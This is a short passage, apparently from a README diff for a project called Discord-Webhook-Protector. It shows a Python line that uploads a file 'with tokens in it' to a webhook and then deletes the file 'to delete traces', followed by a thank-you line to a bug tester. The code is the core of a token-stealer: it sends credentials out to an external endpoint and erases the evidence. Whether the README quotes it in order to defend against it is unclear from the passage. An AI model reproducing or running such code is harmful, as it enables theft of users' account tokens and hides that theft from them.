trhacknon/Discord-Webhook-Protector/README.md

 requests.post(api, headers={"Authorization": key}, files={"upload_file": open(_file, 'rb')}) #send text file with tokens in it to the webhook os.remove(_file) #delete traces
 ```

+> Thank you [xrevix](https://github.com/xrevix) for bug testing and reporting all of them 😘